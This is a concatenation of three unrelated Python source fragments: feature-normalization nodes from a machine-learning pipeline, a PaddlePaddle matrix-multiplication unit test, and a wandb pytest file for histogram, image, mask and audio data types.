""" Collects the values each feature takes on in the training set. """
# Check that feature vectors are compatible
self.extract_feature_names(data)
data_array = data.view(numpy.ndarray)
self.collect_data(data_array)
def extract_feature_names(self, data):
if self.feature_names == []:
self.feature_names = data.feature_names
self.dim=len(self.feature_names)
elif type(self.feature_names != data.feature_names) is bool:
if self.feature_names != data.feature_names:
raise InconsistentFeatureVectorsException(
"Two feature vectors do not contain the same features!")
elif (self.feature_names != data.feature_names).all():
raise InconsistentFeatureVectorsException(
"Two feature vectors do not contain the same features!")
def _execute(self, data):
""" Normalizes the feature vector data.
Normalizes the feature vector data by subtracting
the *translation* variable and scaling it with *mult*.
.. todo:: check if problems in data transformation still occur
"""
if not (self.load_path is None or self.load_path=="already_loaded"):
self.replace_keywords_in_load_path()
load_file = open(self.load_path, 'r')
self.translation, self.mult, self.feature_names = cPickle.load(load_file)
self.load_path = "already_loaded"
self.extract_feature_names(data)
# mapping of feature names if current features are a subset
# of loaded feature normalization in the training
if self.feature_indices is None:
try:
if type(self.feature_names) is numpy.ndarray:
self.feature_names = self.feature_names.tolist()
self.feature_indices = [self.feature_names.index(feature_name)
for feature_name in data.feature_names]
except ValueError:
raise InconsistentFeatureVectorsException("Cannot normalize a feature vector "
"with an unknown feature dimension!")
# The data reference is not changed or deleted but here it is
# temporarily replaced.
if not self.translation is None:
data = (data - self.translation[self.feature_indices]) \
* self.mult[self.feature_indices]
else :
data = data * 0
# Handle cases where lower and upper bound are identical
# This is for example the case, when
# one feature generating measurement device is off or out of order
# TODO check if still needed
data[numpy.isnan(data)] = 0.0
data[numpy.isinf(data)] = 0.0
# for i, v in enumerate(data[0,:]):
# if v > 1:
# data[0,i] = 1 + self.scaling*(1 - math.exp(1-v))
# elif v < 0:
# data[0,i] = self.scaling*(math.exp(v)-1)
return FeatureVector(data,
data.feature_names)
def collect_data(self,data):
self.samples.append(numpy.array(data[0,:]))
@UniformParameter("outlier_percentage", min_value=0, max_value=100)
class OutlierFeatureNormalizationNode(FeatureNormalizationNode):
""" Map the feature vectors of the training set to the range [0,1]^n
A class that normalizes each dimension of the feature
vector so that an upper boundary value (learned from in the training set)
is mapped to 1, and a lower boundary value to 0.
All other values are linearly interpolated. Optionally, one can specify
an *outlier_percentage* that determines which ratio of the training data
is considered to be a potential outlier. *outlier_percentage*/2 samples
are allowed to be larger than the determined upper boundary, and
*outlier_percentage*/2 samples are allowed to be smaller than the
determined lower boundary.
**Parameters**
:outlier_percentage:
The percentage of training instances that are potential outliers.
(*optional, default: 0*)
**Exemplary Call**
.. code-block:: yaml
-
node : OutlierFeatureNormalization
parameters :
outlier_percentage : 10
:Author: Jan Hendrik Metzen (jhm@informatik.uni-bremen.de)
:Created: ??
:Revised (1): 2009/07/16
:Revised (2): 2009/09/03
"""
def __init__(self, outlier_percentage=0, **kwargs):
super(OutlierFeatureNormalizationNode, self).__init__(**kwargs)
self.set_permanent_attributes(outlier_percentage = outlier_percentage,
samples = defaultdict(list))
def collect_data(self, data):
for feature_index, feature_value in enumerate(data[0,:]):
self.samples[feature_index].append(feature_value)
def _stop_training(self):
""" Computes the upper and lower boundary for normalization.
For this computation, the largest and smallest *outlier_percentage*/2
examples for each feature dimension are ignored.
The smallest and largest remaining example are used as lower and upper
boundary.
"""
self.lower_bounds = numpy.zeros((1, len(self.samples)))
self.upper_bounds = numpy.zeros((1, len(self.samples)))
for feature_index, feature_values in self.samples.iteritems():
self.lower_bounds[0, feature_index] = \
scipy.stats.scoreatpercentile(feature_values,
self.outlier_percentage/2)
self.upper_bounds[0, feature_index] = \
scipy.stats.scoreatpercentile(feature_values,
100 - self.outlier_percentage/2)
# Cleaning up...
self.samples = defaultdict(list)
# name unification
self.translation = self.lower_bounds[0,:]
self.mult = 1/(self.upper_bounds[0,:]-self.lower_bounds[0,:])
self.mult[numpy.isinf(self.mult)] = 0.0
self.mult[numpy.isnan(self.mult)] = 0.0
class GaussianFeatureNormalizationNode(FeatureNormalizationNode):
""" Transform the features, such that they have zero mean and variance one
A class that normalizes each dimension of the feature
vector so that it has zero mean and variance one.
The relevant values are learned from the training set.
**Exemplary Call**
.. code-block:: yaml
-
node : Gaussian_Feature_Normalization
:Author: Mario Krell (Mario.Krell@dfki.de)
:Created: 2011/04/15
"""
def __init__(self, **kwargs):
self.n = 0
self.mean_diff = None
self.translation = None
self.mult = None
super(GaussianFeatureNormalizationNode, self).__init__(**kwargs)
def _stop_training(self):
""" Computes mean and std deviation of each feature"""
if not self.is_retrainable():
self.translation = numpy.mean(numpy.array(self.samples),axis=0)
self.mult = numpy.std(numpy.array(self.samples),axis=0)
for i in range(self.dim):
if not(abs(self.mult[i]) < self.tolerance):
self.mult[i] = 1/self.mult[i]
else:
self.mult[i] = 1
self.n = len(self.samples)
# clean up to save memory
self.samples = []
def _train(self, data):
if not self.is_retrainable():
super(GaussianFeatureNormalizationNode,self)._train(data)
else:
self.extract_feature_names(data)
data_array = data.view(numpy.ndarray)
data_array = data_array[0,:]
if self.translation is None:
self.translation = numpy.zeros(data_array.shape)
self.sqr_sum = numpy.zeros(data_array.shape)
self.mult = numpy.zeros(data_array.shape)
self.n += 1
delta = data_array - self.translation
self.translation += 1.0*delta / self.n
self.sqr_sum += 1.0*(self.n-1)/self.n*(delta**2)
for i in range(self.dim):
if not (self.sqr_sum[i] < self.tolerance):
self.mult[i] = numpy.sqrt(self.n/self.sqr_sum[i])
def _inc_train(self, data, class_label=None):
self._train(data)
class HistogramFeatureNormalizationNode(FeatureNormalizationNode):
""" Transform the features, such that they have zero mean in
the main bit in the histogram and variance one on that bit.
The relevant values are learned from the training set.
**Exemplary Call**
.. code-block:: yaml
-
node : Histogram_Feature_Normalization
:Author: Mario Krell (Mario.Krell@dfki.de)
:Created: 2011/04/15
"""
def _stop_training(self):
""" Computes mean and std deviation of each feature"""
mean=[]
std=[]
self.feature_values = numpy.array(self.samples).T
for values in self.feature_values:
hvalues,bins = numpy.histogram(values, bins = 3)
maxindex = hvalues.argmax()
min_bound = bins[maxindex]
max_bound = bins[maxindex+1]
i=0
max_sum=0
relevant_values=[]
for value in values:
if min_bound <= value <= max_bound:
relevant_values.append(value)
# max_sum += value
# mean.append(1.0*max_sum/i)
mean.append(numpy.mean(relevant_values))
std.append(numpy.std(relevant_values))
self.translation = numpy.array(mean)
self.mult = numpy.array(std)
#self.mult = numpy.std(numpy.array(self.samples),axis=0)
for i in range(self.dim):
if not(abs(self.mult[i]) < self.tolerance):
self.mult[i] = 1/self.mult[i]
else:
self.mult[i] = 1
# Cleaning up...
self.samples = []
self.feature_values = []
mean = []
std = []
@BooleanParameter("dimension_scale")
class EuclideanFeatureNormalizationNode(BaseNode):
""" Normalize feature vectors to Euclidean norm with respect to dimensions
**Parameters**
:dimension_scale:
Scale the output to ||x|| * dim(x)
(to get bigger values)
(*optional, default: False*)
**Exemplary Call**
.. code-block:: yaml
-
node : Euclidean_Feature_Normalization
parameters :
dimension_scale : True
:Author: Mario Krell (Mario.Krell@dfki.de)
:Created: 2011/04/15
"""
def __init__(self, dimension_scale = False, **kwargs):
super(EuclideanFeatureNormalizationNode, self).__init__(**kwargs)
self.set_permanent_attributes(dim = None,
dimension_scale=dimension_scale,
feature_names=[])
def _execute(self, data):
""" Normalizes the samples vector to norm one """
if self.feature_names == []:
self.feature_names = data.feature_names
elif self.feature_names != data.feature_names:
raise InconsistentFeatureVectorsException(
"Two feature vectors do not contain the same features!")
x = data.view(numpy.ndarray)
a = x[0,:]
if self.dim == None:
self.dim = len(a)
norm = numpy.linalg.norm(a)
if norm == 0:
norm = 1
a = a * numpy.longdouble(1) / norm
if self.dimension_scale:
a = FeatureVector([len(a)*a],self.feature_names)
return a
else:
return FeatureVector([a],self.feature_names)
def store_state(self, result_dir, index=None):
""" Stores this node in the given directory *result_dir* """
if self.store:
pass
class InfinityNormFeatureNormalizationNode(BaseNode):
""" Normalize feature vectors with infinity norm to [-1,1]
**Parameters**
**Exemplary Call**
.. code-block:: yaml
-
node : I_FN
:Author: Mario Krell and Marc Tabie (Mario.Krell and Marc.Tabie@dfki.de)
:Created: 2012/07/16
"""
def __init__(self, **kwargs):
super(InfinityNormFeatureNormalizationNode, self).__init__(**kwargs)
def _execute(self, data):
""" Normalizes the samples vector to inf norm one"""
x = data.view(numpy.ndarray)
# always convert the array you do not start with an integer
a = x[0,:].astype(numpy.double)
inf_norm = numpy.max(numpy.abs(a))
if inf_norm == 0:
inf_norm = 1
a /= inf_norm
return FeatureVector([a], data.feature_names)
# Infinity and Euclidean norm are covered by other nodes.
# Other possible norms then the ones suggested here
# are not that common or relevant.
@ChoiceParameter("order", choices=["-inf", 0, 1, 3, 4])
class NumpyFeatureNormalizationNode(BaseNode):
""" Normalize feature vectors to any numpy vector norm
**Parameters**
:order:
Order of the norm, used by numpy (ord-parameter by numpy).
The default is the 1-Norm normalization.
:inf: max(abs(x))
:-inf: min(abs(x))
:0: sum(x != 0)
:other: sum(abs(x)**ord)**(1./ord)
(*optional, default: 1*)
**Exemplary Call**
.. code-block:: yaml
-
node : N_FN
parameters :
order : 42
:Author: Mario Michael Krell (Mario.Krell@dfki.de)
:Created: 2017/03/19
"""
def __init__(self, order=1, **kwargs):
super(NumpyFeatureNormalizationNode, self).__init__(**kwargs)
# text mapping
if order == "inf":
order = numpy.inf
elif order == "-inf":
order = - numpy.inf
else:
order = float(order)
self.set_permanent_attributes(ord=order,
feature_names=None)
def _execute(self, data):
""" Normalizes the samples vector to norm one """
if self.feature_names is None:
self.feature_names = data.feature_names
elif self.feature_names != data.feature_names:
raise InconsistentFeatureVectorsException(
"Two feature vectors do not contain the same features!")
x = data.view(numpy.ndarray)
a = x[0, :]
norm = numpy.linalg.norm(a, self.ord)
if norm == 0:
norm = 1
return FeatureVector([a * numpy.longdouble(1) / norm],
self.feature_names)
def store_state(self, result_dir, index=None):
""" Stores this node in the given directory *result_dir* """
if self.store:
pass
_NODE_MAPPING = {"Feature_Normalization": OutlierFeatureNormalizationNode,
"Outlier_Feature_Normalization": OutlierFeatureNormalizationNode,
"FN": OutlierFeatureNormalizationNode,
"O_FN": OutlierFeatureNormalizationNode,
"Euclidean_Feature_Normalization": EuclideanFeatureNormalizationNode,
"E_FN": EuclideanFeatureNormalizationNode,
"Gaussian_Feature_Normalization": GaussianFeatureNormalizationNode,
"G_FN": GaussianFeatureNormalizationNode,
"Histogram_Feature_Normalization": HistogramFeatureNormalizationNode,
"H_FN": HistogramFeatureNormalizationNode,
"I_FN": InfinityNormFeatureNormalizationNode,
"N_FN": NumpyFeatureNormalizationNode,
}
| |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import paddle.fluid.core as core
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
from paddle.fluid import Program, program_guard
def generate_compatible_shapes(dim_X, dim_Y, transpose_X, transpose_Y):
BATCH_SIZE = 2
M = 3
N = 4
K = 5
if (dim_X == 1 and transpose_X) or (dim_Y == 1 and transpose_Y):
K = 1
if dim_X == 1:
if transpose_X:
shape_X = [M]
else:
shape_X = [K]
if dim_Y == 1:
if transpose_Y:
shape_Y = [N]
else:
shape_Y = [K]
if dim_X >= 2:
if transpose_X:
shape_X = [K, M]
else:
shape_X = [M, K]
if dim_X == 3:
shape_X = [BATCH_SIZE] + shape_X
if dim_Y >= 2:
if transpose_Y:
shape_Y = [N, K]
else:
shape_Y = [K, N]
if dim_Y == 3:
shape_Y = [BATCH_SIZE] + shape_Y
return shape_X, shape_Y
def reference_matmul(X, Y, transpose_X=False, transpose_Y=False):
"""Reference forward implementation using np.matmul."""
# np.matmul does not support the transpose flags, so we manually
# transpose X and Y appropriately.
if transpose_X:
if X.ndim == 1:
X = X.reshape((X.size, 1))
elif X.ndim == 2:
X = X.T
else:
dim = [i for i in range(len(X.shape))]
dim[-1], dim[len(X.shape) - 2] = dim[len(X.shape) - 2], dim[-1]
X = np.transpose(X, tuple(dim))
if transpose_Y:
if Y.ndim == 1:
Y = Y.reshape((1, Y.size))
else:
dim = [i for i in range(len(Y.shape))]
dim[-1], dim[len(Y.shape) - 2] = dim[len(Y.shape) - 2], dim[-1]
Y = np.transpose(Y, tuple(dim))
Out = np.matmul(X, Y)
if not Out.shape:
# We do not support 0-dimensional Tensors (scalars). So where
# np.matmul outputs a scalar, we must convert to a Tensor of
# shape (1, ) instead.
# Everywhere else, we are compatible with np.matmul.
Out = np.array([Out], dtype="float32")
return Out
class Generator(object):
def setUp(self):
self.op_type = "matmul"
X = np.random.random(self.shape_X).astype("float32")
Y = np.random.random(self.shape_Y).astype("float32")
Out = reference_matmul(X, Y, self.transpose_X, self.transpose_Y)
self.inputs = {'X': X, 'Y': Y}
self.attrs = {
'transpose_X': self.transpose_X,
'transpose_Y': self.transpose_Y
}
self.outputs = {'Out': Out}
def test_check_output(self):
self.check_output()
def test_check_grad_normal(self):
self.check_grad(['X', 'Y'], 'Out', max_relative_error=1e-3)
def test_check_grad_ignore_x(self):
self.check_grad(
['Y'], 'Out', max_relative_error=1e-3, no_grad_set=set("X"))
def test_check_grad_ignore_y(self):
self.check_grad(
['X'], 'Out', max_relative_error=1e-3, no_grad_set=set('Y'))
class TestMatmulOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The inputs type of matmul_op must be Variable.
input1 = 12
self.assertRaises(TypeError, fluid.layers.matmul, input1, input1)
# The inputs dtype of matmul_op must be float32, float64.
input2 = fluid.layers.data(
name='input2', shape=[10, 10], dtype="int32")
self.assertRaises(TypeError, fluid.layers.matmul, input2, input2)
input3 = fluid.layers.data(
name='input3', shape=[2, 2], dtype="float16")
fluid.layers.matmul(input3, input3)
# Negative dimension generation
def generate_negative_dims(in_shape):
from itertools import combinations
size = len(in_shape)
indexs = list()
shapes = list()
for i in range(size):
indexs.extend(list(combinations([j for j in range(size)], i + 1)))
for idx in indexs:
shapes.append(
[in_shape[i] if i not in idx else -1 for i in range(size)])
return shapes
# Build program with inputs sizes that contain negative numbers
def test_negative_dims_program(obj):
for shape_x in generate_negative_dims(obj.shape_X):
for shape_y in generate_negative_dims(obj.shape_Y):
X = np.random.random(obj.shape_X).astype("float32")
Y = np.random.random(obj.shape_Y).astype("float32")
Ref = reference_matmul(X, Y, obj.transpose_X, obj.transpose_Y)
with program_guard(Program(), Program()):
x = fluid.data(name='x', shape=shape_x, dtype='float32')
y = fluid.data(name='y', shape=shape_y, dtype='float32')
output = fluid.layers.matmul(x, y, obj.transpose_X,
obj.transpose_Y)
obj.assertEqual(len(Ref.shape), len(output.shape))
for idx in range(len(Ref.shape)):
if output.shape[idx] != -1:
obj.assertEqual(Ref.shape[idx], output.shape[idx])
exe = fluid.Executor(fluid.CPUPlace())
res, = exe.run(fluid.default_main_program(),
feed={'x': X,
'y': Y},
fetch_list=[output])
np.allclose(res, Ref, atol=1e-5)
# Generate program api cases for all negative possibilities
def api_test(dim_x, dim_y, trans_x, trans_y):
test_name = ('TestMatMulAPI_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
dim_x, dim_y, trans_x, trans_y))
shape_x, shape_y = generate_compatible_shapes(dim_x, dim_y, trans_x,
trans_y)
globals()[test_name] = type(test_name, (unittest.TestCase, ), {
'shape_X': shape_x,
'shape_Y': shape_y,
'transpose_X': trans_x,
'transpose_Y': trans_y,
'test_propram': test_negative_dims_program,
})
# Generate operators cases for all possibilities
def inject_test(dim_x, dim_y, trans_x, trans_y):
test_name = ('TestMatMulOp_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
dim_x, dim_y, trans_x, trans_y))
shape_x, shape_y = generate_compatible_shapes(dim_x, dim_y, trans_x,
trans_y)
globals()[test_name] = type(test_name, (Generator, OpTest), {
'shape_X': shape_x,
'shape_Y': shape_y,
'transpose_X': trans_x,
'transpose_Y': trans_y,
})
for dim_X in (1, 2, 3):
for dim_Y in (1, 2, 3):
for transose_x in (False, True):
for transose_y in (False, True):
inject_test(dim_X, dim_Y, transose_x, transose_y)
api_test(dim_X, dim_Y, transose_x, transose_y)
# Test case more batch_size and N, M, K
def generate_compatible_shapes_batch(dim_X, dim_Y, transpose_X, transpose_Y,
batch_size):
BATCH_SIZE = 2
M = 3
N = 4
K = 5
if (dim_X == 1 and transpose_X) or (dim_Y == 1 and transpose_Y):
K = 1
if dim_X == 1:
if transpose_X:
shape_X = [M]
else:
shape_X = [K]
if dim_Y == 1:
if transpose_Y:
shape_Y = [N]
else:
shape_Y = [K]
if dim_X >= 2:
if transpose_X:
shape_X = [K, M]
else:
shape_X = [M, K]
if dim_X == 3:
shape_X = [BATCH_SIZE] + shape_X
if dim_Y >= 2:
if transpose_Y:
shape_Y = [N, K]
else:
shape_Y = [K, N]
if dim_Y == 3:
shape_Y = [BATCH_SIZE] + shape_Y
return shape_X, shape_Y
# Test case n-dim
def generate_compatible_shapes_ndim(dim, transpose_X, transpose_Y):
M = 2
N = 4
K = 3
shape_X = [2 for _ in range(dim - 2)]
shape_Y = [2 for _ in range(dim - 2)]
if transpose_X:
shape_X += [K, M]
else:
shape_X += [M, K]
if transpose_Y:
shape_Y += [N, K]
else:
shape_Y += [K, N]
return shape_X, shape_Y
# # Test case n-dim
for dim in [4]:
for transpose_X in [False, True]:
for transpose_Y in [False, True]:
test_name = (
'TestMatMulOp_dimX_{}_dim_Y_{}_transX_{}_transY_{}'.format(
dim, dim, transpose_X, transpose_Y))
shape_X, shape_Y = generate_compatible_shapes_ndim(dim, transpose_X,
transpose_Y)
globals()[test_name] = type(test_name, (Generator, OpTest), {
'shape_X': shape_X,
'shape_Y': shape_Y,
'transpose_X': transpose_X,
'transpose_Y': transpose_Y,
})
class API_TestMm(unittest.TestCase):
def test_out(self):
with fluid.program_guard(fluid.Program()):
x = fluid.data(name="x", shape=[2], dtype="float64")
y = fluid.data(name='y', shape=[2], dtype='float64')
res = fluid.data(name="output", shape=[1], dtype="float64")
result = paddle.mm(x, y)
exe = fluid.Executor(fluid.CPUPlace())
data1 = np.random.rand(2)
data2 = np.random.rand(2)
np_res = exe.run(feed={'x': data1, 'y': data2}, fetch_list=[result])
expected_result = np.matmul(
data1.reshape(1, 2), data2.reshape(2, 1))
self.assertTrue(
np.allclose(
np_res, expected_result, atol=1e-5),
"two value is\
{}\n{}, check diff!".format(np_res, expected_result))
def test_dygraph_without_out(self):
device = fluid.CPUPlace()
with fluid.dygraph.guard(device):
input_array1 = np.random.rand(3, 4).astype("float64")
input_array2 = np.random.rand(4, 3).astype("float64")
data1 = fluid.dygraph.to_variable(input_array1)
data2 = fluid.dygraph.to_variable(input_array2)
out = paddle.mm(data1, data2)
expected_result = np.matmul(input_array1, input_array2)
self.assertTrue(np.allclose(expected_result, out.numpy()))
class Test_API_Matmul(unittest.TestCase):
def test_dygraph_without_out(self):
device = fluid.CPUPlace()
with fluid.dygraph.guard(device):
input_array1 = np.random.rand(3, 4).astype("float64")
input_array2 = np.random.rand(4, 3).astype("float64")
data1 = fluid.dygraph.to_variable(input_array1)
data2 = fluid.dygraph.to_variable(input_array2)
out = paddle.matmul(data1, data2)
expected_result = np.matmul(input_array1, input_array2)
self.assertTrue(np.allclose(expected_result, out.numpy()))
class API_TestMmError(unittest.TestCase):
def test_errors(self):
def test_error1():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data1 = fluid.data(name="data1", shape=[10, 2], dtype="float32")
data2 = fluid.data(name="data2", shape=[3, 10], dtype="float32")
paddle.mm(data1, data2)
self.assertRaises(ValueError, test_error1)
def test_error2():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data1 = fluid.data(
name="data1", shape=[-1, 10, 2], dtype="float32")
data2 = fluid.data(
name="data2", shape=[-1, 2, 10], dtype="float32")
paddle.mm(data1, data2)
test_error2()
def test_error3():
with fluid.program_guard(fluid.Program(), fluid.Program()):
data1 = fluid.data(
name="data1", shape=[10, 10, 2], dtype="float32")
data2 = fluid.data(
name="data2", shape=[3, 2, 10], dtype="float32")
paddle.mm(data1, data2)
self.assertRaises(ValueError, test_error3)
if __name__ == "__main__":
unittest.main()
| |
import wandb
from wandb import data_types
from wandb.sdk.data_types.base_types.media import _numpy_arrays_to_lists
import numpy as np
import pytest
import PIL
import os
import six
import sys
import glob
import platform
from click.testing import CliRunner
from . import utils
from .utils import dummy_data
import matplotlib
import rdkit.Chem
from wandb import Api
import time
matplotlib.use("Agg")
import matplotlib.pyplot as plt # noqa: E402
data = np.random.randint(255, size=(1000))
@pytest.fixture
def api(runner):
return Api()
def test_wb_value(live_mock_server, test_settings):
run = wandb.init(settings=test_settings)
local_art = wandb.Artifact("N", "T")
public_art = run.use_artifact("N:latest")
wbvalue = data_types.WBValue()
with pytest.raises(NotImplementedError):
wbvalue.to_json(local_art)
with pytest.raises(NotImplementedError):
data_types.WBValue.from_json({}, public_art)
assert data_types.WBValue.with_suffix("item") == "item.json"
table = data_types.WBValue.init_from_json(
{
"_type": "table",
"data": [[]],
"columns": [],
"column_types": wandb.data_types._dtypes.TypedDictType({}).to_json(),
},
public_art,
)
assert isinstance(table, data_types.WBValue) and isinstance(
table, wandb.data_types.Table
)
type_mapping = data_types.WBValue.type_mapping()
assert all(
[issubclass(type_mapping[key], data_types.WBValue) for key in type_mapping]
)
assert wbvalue == wbvalue
assert wbvalue != data_types.WBValue()
run.finish()
@pytest.mark.skipif(sys.version_info >= (3, 10), reason="no pandas py3.10 wheel")
def test_log_dataframe(live_mock_server, test_settings):
import pandas as pd
run = wandb.init(settings=test_settings)
cv_results = pd.DataFrame(data={"test_col": [1, 2, 3], "test_col2": [4, 5, 6]})
run.log({"results_df": cv_results})
run.finish()
ctx = live_mock_server.get_ctx()
assert len(ctx["artifacts"]) == 1
def test_raw_data():
wbhist = wandb.Histogram(data)
assert len(wbhist.histogram) == 64
def test_np_histogram():
wbhist = wandb.Histogram(np_histogram=np.histogram(data))
assert len(wbhist.histogram) == 10
def test_manual_histogram():
wbhist = wandb.Histogram(np_histogram=([1, 2, 4], [3, 10, 20, 0]))
assert len(wbhist.histogram) == 3
def test_invalid_histogram():
with pytest.raises(ValueError):
wandb.Histogram(np_histogram=([1, 2, 3], [1]))
image = np.zeros((28, 28))
def test_captions():
wbone = wandb.Image(image, caption="Cool")
wbtwo = wandb.Image(image, caption="Nice")
assert wandb.Image.all_captions([wbone, wbtwo]) == ["Cool", "Nice"]
def test_bind_image(mocked_run):
wb_image = wandb.Image(image)
wb_image.bind_to_run(mocked_run, "stuff", 10)
assert wb_image.is_bound()
full_box = {
"position": {"middle": (0.5, 0.5), "width": 0.1, "height": 0.2},
"class_id": 2,
"box_caption": "This is a big car",
"scores": {"acc": 0.3},
}
# Helper function return a new dictionary with the key removed
def dissoc(d, key):
new_d = d.copy()
new_d.pop(key)
return new_d
optional_keys = ["box_caption", "scores"]
boxes_with_removed_optional_args = [dissoc(full_box, k) for k in optional_keys]
def test_image_accepts_other_images(mocked_run):
image_a = wandb.Image(np.random.random((300, 300, 3)))
image_b = wandb.Image(image_a)
assert image_a == image_b
def test_image_accepts_bounding_boxes(mocked_run):
img = wandb.Image(image, boxes={"predictions": {"box_data": [full_box]}})
img.bind_to_run(mocked_run, "images", 0)
img_json = img.to_json(mocked_run)
path = img_json["boxes"]["predictions"]["path"]
assert os.path.exists(os.path.join(mocked_run.dir, path))
def test_image_accepts_bounding_boxes_optional_args(mocked_run):
img = data_types.Image(
image, boxes={"predictions": {"box_data": boxes_with_removed_optional_args}}
)
img.bind_to_run(mocked_run, "images", 0)
img_json = img.to_json(mocked_run)
path = img_json["boxes"]["predictions"]["path"]
assert os.path.exists(os.path.join(mocked_run.dir, path))
standard_mask = {
"mask_data": np.array([[1, 2, 2, 2], [2, 3, 3, 4], [4, 4, 4, 4], [4, 4, 4, 2]]),
"class_labels": {1: "car", 2: "pedestrian", 3: "tractor", 4: "cthululu"},
}
def test_image_accepts_masks(mocked_run):
img = wandb.Image(image, masks={"overlay": standard_mask})
img.bind_to_run(mocked_run, "images", 0)
img_json = img.to_json(mocked_run)
path = img_json["masks"]["overlay"]["path"]
assert os.path.exists(os.path.join(mocked_run.dir, path))
def test_image_accepts_masks_without_class_labels(mocked_run):
img = wandb.Image(image, masks={"overlay": dissoc(standard_mask, "class_labels")})
img.bind_to_run(mocked_run, "images", 0)
img_json = img.to_json(mocked_run)
path = img_json["masks"]["overlay"]["path"]
assert os.path.exists(os.path.join(mocked_run.dir, path))
def test_cant_serialize_to_other_run(mocked_run, test_settings):
"""This isn't implemented yet. Should work eventually."""
other_run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
other_run._set_backend(mocked_run._backend)
wb_image = wandb.Image(image)
wb_image.bind_to_run(mocked_run, "stuff", 10)
with pytest.raises(AssertionError):
wb_image.to_json(other_run)
def test_image_seq_to_json(mocked_run):
wb_image = wandb.Image(image)
wb_image.bind_to_run(mocked_run, "test", 0, 0)
meta = wandb.Image.seq_to_json([wb_image], mocked_run, "test", 0)
assert os.path.exists(
os.path.join(mocked_run.dir, "media", "images", "test_0_0.png")
)
meta_expected = {
"_type": "images/separated",
"count": 1,
"height": 28,
"width": 28,
}
assert utils.subdict(meta, meta_expected) == meta_expected
def test_max_images(caplog, mocked_run):
large_image = np.random.randint(255, size=(10, 10))
large_list = [wandb.Image(large_image)] * 200
large_list[0].bind_to_run(mocked_run, "test2", 0, 0)
meta = wandb.Image.seq_to_json(
wandb.wandb_sdk.data_types.utils._prune_max_seq(large_list),
mocked_run,
"test2",
0,
)
expected = {
"_type": "images/separated",
"count": data_types.Image.MAX_ITEMS,
"height": 10,
"width": 10,
}
path = os.path.join(mocked_run.dir, "media/images/test2_0_0.png")
assert utils.subdict(meta, expected) == expected
assert os.path.exists(os.path.join(mocked_run.dir, "media/images/test2_0_0.png"))
def test_audio_sample_rates():
audio1 = np.random.uniform(-1, 1, 44100)
audio2 = np.random.uniform(-1, 1, 88200)
wbaudio1 = wandb.Audio(audio1, sample_rate=44100)
wbaudio2 = wandb.Audio(audio2, sample_rate=88200)
assert wandb.Audio.sample_rates([wbaudio1, wbaudio2]) == [44100, 88200]
# test with missing sample rate
with pytest.raises(ValueError):
wandb.Audio(audio1)
def test_audio_durations():
audio1 = np.random.uniform(-1, 1, 44100)
audio2 = np.random.uniform(-1, 1, 88200)
wbaudio1 = wandb.Audio(audio1, sample_rate=44100)
wbaudio2 = wandb.Audio(audio2, sample_rate=44100)
assert wandb.Audio.durations([wbaudio1, wbaudio2]) == [1.0, 2.0]
def test_audio_captions():
audio = np.random.uniform(-1, 1, 44100)
sample_rate = 44100
caption1 = "This is what a dog sounds like"
caption2 = "This is what a chicken sounds like"
# test with all captions
wbaudio1 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption1)
wbaudio2 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption2)
assert wandb.Audio.captions([wbaudio1, wbaudio2]) == [caption1, caption2]
# test with no captions
wbaudio3 = wandb.Audio(audio, sample_rate=sample_rate)
wbaudio4 = wandb.Audio(audio, sample_rate=sample_rate)
assert wandb.Audio.captions([wbaudio3, wbaudio4]) is False
# test with some captions
wbaudio5 = wandb.Audio(audio, sample_rate=sample_rate)
wbaudio6 = wandb.Audio(audio, sample_rate=sample_rate, caption=caption2)
assert wandb.Audio.captions([wbaudio5, wbaudio6]) == ["", caption2]
def test_audio_to_json(mocked_run):
audio = np.zeros(44100)
audioObj = wandb.Audio(audio, sample_rate=44100)
audioObj.bind_to_run(mocked_run, "test", 0)
meta = wandb.Audio.seq_to_json([audioObj], mocked_run, "test", 0)
assert os.path.exists(os.path.join(mocked_run.dir, meta["audio"][0]["path"]))
meta_expected = {
"_type": "audio",
"count": 1,
"sampleRates": [44100],
"durations": [1.0],
}
assert utils.subdict(meta, meta_expected) == meta_expected
audio_expected = {
"_type": "audio-file",
"caption": None,
"size": 88244,
}
assert utils.subdict(meta["audio"][0], audio_expected) == audio_expected
wandb.finish()
def test_audio_refs():
audioObj = wandb.Audio(
"https://wandb-artifacts-refs-public-test.s3-us-west-2.amazonaws.com/StarWars3.wav"
)
art = wandb.Artifact("audio_ref_test", "dataset")
art.add(audioObj, "audio_ref")
audio_expected = {
"_type": "audio-file",
"caption": None,
}
assert utils.subdict(audioObj.to_json(art), audio_expected) == audio_expected
def test_guess_mode():
image = np.random.randint(255, size=(28, 28, 3))
wbimg = wandb.Image(image)
assert wbimg.image.mode == "RGB"
def test_pil():
pil = PIL.Image.new("L", (28, 28))
img = wandb.Image(pil)
assert list(img.image.getdata()) == list(pil.getdata())
def test_matplotlib_image():
plt.plot([1, 2, 2, 4])
img = wandb.Image(plt)
assert img.image.width == 640
def test_matplotlib_image_with_multiple_axes():
"""Ensures that wandb.Image constructor can accept a pyplot or figure
reference in which the figure has multiple axes. Importantly, there is
no requirement that any of the axes have plotted data.
"""
for fig in utils.matplotlib_multiple_axes_figures():
wandb.Image(fig) # this should not error.
for fig in utils.matplotlib_multiple_axes_figures():
wandb.Image(plt) # this should not error.
@pytest.mark.skipif(
sys.version_info >= (3, 9), reason="plotly doesn't support py3.9 yet"
)
def test_matplotlib_plotly_with_multiple_axes():
"""Ensures that wandb.Plotly constructor can accept a plotly figure
reference in which the figure has multiple axes. Importantly, there is
no requirement that any of the axes have plotted data.
"""
for fig in utils.matplotlib_multiple_axes_figures():
wandb.Plotly(fig) # this should not error.
